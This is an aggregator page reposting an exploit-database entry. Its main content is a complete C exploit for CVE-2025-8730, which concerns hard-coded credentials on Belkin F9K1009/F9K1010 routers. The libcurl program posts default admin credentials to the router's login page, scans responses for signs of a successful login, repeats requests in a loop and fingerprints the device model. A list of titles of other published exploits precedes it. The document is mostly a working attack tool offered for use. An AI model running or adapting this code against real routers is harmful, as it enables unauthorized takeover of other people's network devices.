惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog RSS Feed
Spread Privacy
Spread Privacy
T
Threatpost
C
Cisco Blogs
P
Palo Alto Networks Blog
AI
AI
Cyberwarzone
Cyberwarzone
NISL@THU
NISL@THU
P
Privacy & Cybersecurity Law Blog
G
GRAHAM CLULEY
Simon Willison's Weblog
Simon Willison's Weblog
T
Tor Project blog
Latest news
Latest news
AWS News Blog
AWS News Blog
D
Docker
S
SegmentFault 最新的问题
博客园 - 聂微东
WordPress大学
WordPress大学
Vercel News
Vercel News
S
Securelist
爱范儿
爱范儿
J
Java Code Geeks
Know Your Adversary
Know Your Adversary
S
Schneier on Security
Hugging Face - Blog
Hugging Face - Blog
F
Fortinet All Blogs
Last Week in AI
Last Week in AI
D
DataBreaches.Net
宝玉的分享
宝玉的分享
D
Darknet – Hacking Tools, Hacker News & Cyber Security
MongoDB | Blog
MongoDB | Blog
Engineering at Meta
Engineering at Meta
K
Kaspersky official blog
美团技术团队
博客园 - 叶小钗
阮一峰的网络日志
阮一峰的网络日志
量子位
博客园_首页
Attack and Defense Labs
Attack and Defense Labs
S
Secure Thoughts
Google Online Security Blog
Google Online Security Blog
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
腾讯CDC
T
Threat Research - Cisco Blogs
雷峰网
雷峰网
有赞技术团队
有赞技术团队
www.infosecurity-magazine.com
www.infosecurity-magazine.com
P
Privacy International News Feed
S
Security Affairs

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials
2025-09-30 · via The Exploit Database - CXSecurity.com

Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials

/* * Title : Belkin F9K1009 F9K1010 2.00.04/2.00.09 - Hard Coded Credentials * Author : Byte Reaper * CVE : CVE-2025-8730 * Description : Exploit demonstrating an authentication bypass vulnerability * in the web interface of Belkin F9K1009 and F9K1010 routers. The flaw resides * in improper session validation logic, allowing remote attackers to gain * unauthorized access to the administrative panel without supplying valid credentials. */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <time.h> #include <errno.h> #define FULL 2000 #define LOGIN_POST 1500 const char *nameFileC = NULL; int verbose = 0; const char *router = NULL; const char *cookies = NULL; int uC = 0; const char *fullurl = NULL; int sleepS = 0; int count = 0; void exitSyscall() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } int checkLen(int len, char *buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! \e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); exitSyscall(); return 1; } else { printf("\e[0;34m[+] Len Is Not Long (%d).\e[0m\n",len); return 0; } return 0; } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitSyscall(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *wordLogin[] = { "login_success", "Welcome", "Dashboard", "admin panel", "Set-Cookie", "Authorization", "token", "sessionid", "redirect", "access granted", "authenticated", "user authenticated", "login ok", "login complete", "login status=success", "login=1", "auth=1", "valid credentials", "home.htm", "main.htm", "index.htm", "config.htm", "firmware.htm", "admin.htm", NULL }; void sleepTime(int sec) { if (sec <= 0) { fprintf(stderr, "\e[0;31m[-] Value seconds must be > 0 !\e[0m\n"); exitSyscall(); } struct timespec req, rem; req.tv_sec = (time_t)sec; req.tv_nsec = 0; printf("\e[0;33m[+] Sleeping for %d seconds...\e[0m\n", sec); while (nanosleep(&req, &rem) == -1) { if (errno == EINTR) { req = rem; continue; } perror("\e[0;31m[-] Nanosleep failed !\e[0m"); exitSyscall(); } printf("\e[0;34m[+] Sleep successful.\e[0m\n"); } void detectDeviceType(const char *routerIp) { printf("\n=================================== [type Device] ===================================\e[0m\n"); CURL *curl = curl_easy_init(); if (!curl) exitSyscall(); struct Mem response = { NULL, 0 }; char full[FULL]; int len = snprintf(full, sizeof(full), "http://%s", routerIp); if (checkLen(len, full, sizeof(full))) { exitSyscall(); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); if (sleepS) { sleepTime(sleepS); } curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 5L); CURLcode res = curl_easy_perform(curl); if (res != CURLE_OK) { fprintf(stderr, "\e[0;31m[-] curl error: %s\n", curl_easy_strerror(res)); } if (response.buffer) { if (strstr(response.buffer, "F9K1009")) { printf("\e[0;36m[+] Device: Belkin F9K1009\e[0m\n"); } else if (strstr(response.buffer, "F9K1010")) { printf("\e[0;36m[+] Device: Belkin F9K1010\e[0m\n"); } else { printf("\e[0;31m[-] Unknown device type\e[0m\n"); free(response.buffer); } } else { printf("\e[0;31m[-] Response Is NULL !\n"); }; response.buffer= NULL; response.len = 0; curl_easy_cleanup(curl); printf("=====================================================================================\n"); } void credentialsRequest(const char *routerIp) { CURL *curl = curl_easy_init(); if (curl == NULL) { printf("\e[0;31m[-] Error Create Object CURL !\e[0m\n"); exitSyscall(); } CURLcode res; char full[FULL]; int nL = 2; struct Mem response; response.buffer= NULL; response.len = 0; for (int l = 0; l <= nL; l++) { if (curl) { char full[FULL]; char post[LOGIN_POST]; if (fullurl != NULL ) { int lenFull = snprintf(full, sizeof(full), "%s", fullurl); if (checkLen(lenFull,full, sizeof(full)) == 1) { printf("\e[0;31m[-] Len FUll URL (Router IP) Is Long !\e[0m\n"); printf("\e[0;31m[-] Len : %d\n",lenFull); exitSyscall(); } printf("[+] Create FULL URL Successfully.\e[0m\n"); printf("[+] Default Port Request : %d\e[0m\n", 80); printf("[+] FULL URL : %s\n", full); } else { int lenI = snprintf(full, sizeof(full), "http://%s/login.htm", routerIp); if (checkLen(lenI,full, sizeof(full)) == 1) { printf("\e[0;31m[-] Len FUll URL (Router IP) Is Long !\e[0m\n"); printf("\e[0;31m[-] Len : %d\e[0m\n",lenI); exitSyscall(); } else { printf("\e[1;34m[+] Create FULL URL Successfully.\e[0m\n"); printf("\e[1;34m[+] Target IP %s\e[0m\n", routerIp); printf("\e[1;34m[+] Default Port Request : %d\e[0m\n", 80); printf("\e[1;34m[+] FULL URL : %s\e[0m\n", full); } } if (l < 2) { //login admin int vA = snprintf(post, sizeof(post), "login_username=admin&login_password=admin"); if (checkLen(vA, post, sizeof(post)) == 1) { printf("\e[0;31m[-] Error Write POST DATA !\e[0m\n"); printf("\e[0;31m[-] Len (data): %d\e[0m\n", vA); exitSyscall(); } printf("\e[0;36m[+] Write Successfully POST DATA .\e[0m\n"); printf("\e[0;36m[%d] Result POST DATA (admin) : \e[0m\n", l); printf("\n%s\n", post); } else { //login 00E0A6-111 int vE = snprintf(post, sizeof(post), "login_usernam=00E0A6-111&login_password=00E0A6-111"); if (checkLen(vE, post, sizeof(post)) == 1) { printf("\e[0;31m[-] Error Write POST DATA !\e[0m\n"); printf("\e[0;31m[-] Len (data): %d\n", vE); exitSyscall(); } printf("\e[0;36m[+] Write Successfully POST DATA .\e[0m\n"); printf("\e[0;36m[%d] Result POST DATA (00E0A6-111) : \e[0m\n", l); printf("\n%s\n", post); } curl_easy_setopt(curl, CURLOPT_URL, full); if (uC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, post); curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(post)); curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); if (sleepS) { sleepTime(sleepS); } curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0)"); headers = curl_slist_append(headers, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br"); headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5"); headers = curl_slist_append(headers, "Connection: keep-alive"); headers = curl_slist_append(headers, "Content-Type: application/json"); headers = curl_slist_append(headers, "Cache-Control: max-age=0"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); if (res == CURLE_OK) { long httpCode = 0; long totalR; double timeredirect; char *redirectUrl = NULL; printf("\e[0;36m[+] Request sent successfully\e[0m\n"); if (response.len == 0) { printf("\e[0;31m[-] Response Len Zero !\e[0m\n"); } curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[0;32m[+] Http Code : %ld\e[0m\n", httpCode); curl_easy_getinfo(curl, CURLINFO_REDIRECT_COUNT, &totalR); curl_easy_getinfo(curl, CURLINFO_REDIRECT_TIME, &timeredirect); curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &redirectUrl); printf("\e[0;35m[+] REDIRECT : ========================\e[0m\n"); printf("\e[0;34m[+] Time REDIRECT: %.1f\e[0m\n", timeredirect); printf("\e[0;34m[+] Total REDIRECT %ld\e[0m\n", totalR); printf("\e[0;34m[+] REDIRECT to : %s\e[0m\n", redirectUrl); printf("\e[0;35m=======================================\e[0m\n"); if (httpCode >= 200 && httpCode < 300) { if (response.buffer) { for (int r = 0; wordLogin[r] != NULL; r++) { if (strstr(response.buffer, wordLogin[r]) != NULL) { printf("\e[0;34m[+] Word Found : %s\n", wordLogin[r]); printf("\e[0;35m============================================= [RESPONSE] =============================================\e[0m\n"); printf("\n%s\n",response.buffer); printf("\e[0;35m ======================================================================================================\e[0m\n"); } if (verbose) { printf("\e[0;31m[-] Word Not Found : %s\e[0m\n",wordLogin[r]); } } } else { printf("\e[0;31m[-] Response Buffer Is NULL !\e[0m\n"); printf("\e[0;31m[-] Possible Waf \e[0m\n"); } } else { printf("\e[0;31m[-] http Code Not Range (%ld)\e[0m\n", httpCode); } } else { printf("\e[0;31m[-] The request was not sent !\e[0m\n"); printf("\e[0;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); exitSyscall(); } } } curl_easy_cleanup(curl); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } } int main(int argc, const char **argv) { printf("+-----------------------------------------------------------+\n"); printf("| Author : [ Byte Reaper ] |\n"); printf("| CVE : [ CVE-2025-8730 ] |\n"); printf("| Type Vuln : [ hard-coded credentials ] |\n"); printf("| Exploit publishing : [ 08/08/2025 ] |\n"); printf("| Target Service : [ Belkin F9K1009/F9K1010 ] |\n"); printf("+-----------------------------------------------------------+\n"); printf("\e[0;31m--------------------------------------------------------------------------------------------------------------------\e[0m\n"); curl_global_init(CURL_GLOBAL_DEFAULT); struct argparse_option options[] = { OPT_STRING('f', "full", &fullurl, "FULL url FORMAT (Login File)"), OPT_HELP(), OPT_STRING('i', "ip", &router, "Router Ip (12.12.12.12)"), OPT_STRING('c', "cookies", &nameFileC, "Enter File cookies"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('s', "sleep", &sleepS, "Sleep Request"), OPT_INTEGER('k', "count", &count, "Number For Loop Request (-k 8 (8 Request))"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (router == NULL && fullurl == NULL) { printf("\e[0;31m[-] Please Enter target Router IP !\e[0m\n"); printf("\e[0;31m[-] Example : ./CVE-2025-8730 -i <IP> \e[0m\n"); exitSyscall(); } if (nameFileC) { uC = 1; } if (verbose) { verbose = 1; } if (fullurl) { credentialsRequest(NULL); } if (sleepS) { sleepTime(sleepS); } if (count) { for (int j = 0; j <= count; j++) { if (fullurl) { credentialsRequest(fullurl); } if (router) { credentialsRequest(router); } } } detectDeviceType(router); credentialsRequest(router); curl_global_cleanup(); return 0; }



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}